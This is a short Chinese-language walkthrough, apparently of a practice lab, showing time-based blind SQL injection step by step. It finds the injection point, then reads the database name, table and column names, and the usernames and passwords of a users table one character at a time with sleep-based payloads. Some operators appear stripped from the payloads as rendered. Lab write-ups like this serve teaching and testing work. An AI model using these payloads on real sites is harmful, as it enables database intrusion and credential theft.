1、寻找注入点1’ and 11--1’ and 12--页面只显示 You are in..... 无回显位判断为时间盲注2、注入数据库爆破库长?id1 and if(length(database())7, sleep(5), 1) --根据库名长度爆库名?id1 and if(ascii(substr(database(),1,1))115, sleep(5), 1) --标蓝部分的为1到8库名长度3. 爆数据表数量?id1 and if((select COUNT(table_name) from information_schema.tables where table_schemadatabase())2, sleep(5), 1) --4.爆数据表名长度?id1 and if(length((select table_name from information_schema.tables where table_schemadatabase() limit 0,1))2, sleep(5), 1) --5.根据表名长度爆表名# 表一第1位字符判断ASCII码97?id1 and if(ascii(substr((select table_name from information_schema.tables where table_schemadatabase() limit 0,1),1,1))97, sleep(5), 1) --表一的第一个字段为e表二的第一个字段为r表三和四的第一个字段为u可能为users表重点关注最后发现表四是users表6.根据users表爆数据列数量?id1 and if((select COUNT(column_name) from information_schema.columns where table_schemadatabase() and table_nameusers)3, sleep(5), 1) --Users中有三个字段7.爆数据列名长度?id1 and if(length((select column_name from information_schema.columns where table_schemadatabase() and table_nameusers limit 0,1))2, sleep(5), 1) --8.根据列名长度爆列名# 判断ASCII码97?id1 and if(ascii(substr((select column_name from information_schema.columns where table_schemadatabase() and table_nameusers limit 0,1),1,1))97, sleep(5), 1) --# 判断字符a推荐用ASCII码97更稳定?id1 and if(substr((select column_name from information_schema.columns where table_schemadatabase() and table_nameusers limit 0,1),1,1)a, sleep(5), 1) --# 适配id列第1位字符i105?id1 and if(ascii(substr((select column_name from information_schema.columns where table_schemadatabase() and table_nameusers limit 0,1),1,1))105, sleep(5), 1) --最终得到users的三个字段名idusernamepassword9.根据列名爆数据值获取用户名和密码信息# 用户名第1位ASCII码97?id1 and if(ascii(substr((select username from users limit 0,1),1,1))97, sleep(5), 1) --# 密码第1位ASCII码97?id1 and if(ascii(substr((select password from users limit 0,1),1,1))97, sleep(5), 1) --# 用户名第1位DD的ASCII码68推荐用ASCII码判断?id1 and if(substr((select username from users limit 0,1),1,1)D, sleep(5), 1) --